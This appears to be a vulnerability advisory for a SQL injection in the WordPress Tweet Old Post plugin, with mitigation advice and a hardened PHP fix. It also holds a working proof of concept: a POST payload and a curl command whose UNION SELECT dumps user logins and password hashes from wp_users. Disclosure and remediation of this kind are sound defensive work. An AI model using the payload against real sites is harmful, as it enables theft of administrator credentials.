Vendor: Tweet Old Post plugin
By: sherl0ck_
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Tweet Old Post plugin
Affected Version From: <= 3.2.5
Affected Version To: <= 3.2.5
Patch Exists: NO
Related CWE:
CPE: a:wordpress:tweet_old_post:3.2.5
Metasploit:
Other Scripts:
Platforms Tested: WordPress (tested on version not specified)
Year: 2011

WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection

The WordPress Tweet Old Post plugin, version 3.2.5 and earlier, is vulnerable to SQL Injection: the "cat" parameter posted to the plugin's ExcludePosts admin page is concatenated into a database query without sanitization. An attacker who can submit that form can use this to execute arbitrary SQL statements against the affected WordPress site's database.

Mitigation:

Update to the latest version of the plugin to fix the SQL Injection vulnerability. Additionally, ensure that all plugins and themes are regularly updated to minimize the risk of exploitation.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: sherl0ck_ < sherl0ck_ [at] alligatorteam [dot] org >
# Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip
# Version: 3.2.5 (tested)

---------------
PoC (POST data)
---------------
URL:
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts

POST Data:
delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1

e.g.:
curl --cookie "[COOKIE]" \
  --data "delids=1&selFilter=excluded&cat=1) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1" \
  http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts

---------------
Vulnerable code
---------------
if(isset($_POST["setFilter"]))
{
    if($_POST["cat"] != 0)
    {
        // $_POST["cat"] is concatenated into the query unescaped and unquoted,
        // so any SQL placed in the parameter becomes part of the statement.
        $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM ".$wpdb->prefix."term_relationships AS tr INNER JOIN ".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy = 'category' AND tt.term_id=" . $_POST["cat"] . ")";
        $cat_filter = $_POST["cat"];
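A hardened rewrite of the category filter above, added here as an example and not taken from the plugin: the "cat" value is cast to an integer and bound through $wpdb->prepare(), so nothing in the parameter can alter the query structure. The function name tweet_old_post_category_filter_hardened, its $sql argument and the capability check are assumptions for the example.

```php
<?php
// Added example, not the plugin's own code. Assumes a WordPress context
// where the global $wpdb object exists and $sql holds the base query.
function tweet_old_post_category_filter_hardened( $sql ) {
    global $wpdb;

    if ( ! isset( $_POST['setFilter'] ) ) {
        return $sql;
    }

    // Assumed hardening: only users allowed to manage options may filter.
    if ( ! current_user_can( 'manage_options' ) ) {
        return $sql;
    }

    // Cast to int. A value such as "1) UNION ..." collapses to the integer 1,
    // so no SQL syntax from the request can reach the statement.
    $cat = isset( $_POST['cat'] ) ? intval( $_POST['cat'] ) : 0;
    if ( 0 === $cat ) {
        return $sql;
    }

    // %d binds the category id as an integer; the table names come from
    // $wpdb->prefix, never from user input.
    $sql .= $wpdb->prepare(
        " and p.ID IN ( SELECT tr.object_id FROM {$wpdb->prefix}term_relationships AS tr"
        . " INNER JOIN {$wpdb->prefix}term_taxonomy AS tt"
        . " ON tr.term_taxonomy_id = tt.term_taxonomy_id"
        . " WHERE tt.taxonomy = 'category' AND tt.term_id = %d )",
        $cat
    );

    return $sql;
}
```

The same cast should be applied wherever the raw value is stored for later use (the $cat_filter assignment in the original), since an unsanitized copy kept in a variable tends to reach another query eventually.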